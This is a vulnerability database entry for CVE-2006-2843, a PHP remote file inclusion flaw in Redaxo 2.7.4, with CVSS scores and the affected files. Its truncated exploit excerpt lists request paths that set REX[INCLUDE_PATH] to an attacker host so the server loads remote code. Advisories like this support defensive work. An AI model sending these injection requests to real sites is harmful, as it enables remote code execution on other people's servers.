7.5
CVSSv2

CVE-2006-2843

Published: 06/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in Redaxo 2.7.4 allows remote malicious users to execute arbitrary PHP code via a URL in the (1) REX[INCLUDE_PATH] parameter in (a) addons/import_export/pages/index.inc.php and (b) pages/community.inc.php.

Vulnerable Product Search on Vulmon Subscribe to Product

redaxo redaxo 2.7.4

Exploits

Script: Redaxo CMS Vendor: wwwredaxode Discovered: beford <xbefordx gmail com> Redaxo 32 - 31 - 30 /redaxo/include/addons/image_resize/pages/indexincphp?REX[INCLUDE_PATH]=attacker Redaxo 30 /redaxo3_0_demos_patched/redaxo/include/addons/image_resize/pages/indexincphp?subpage=relations&REX[INCLUDE_PATH]=attacker /re ...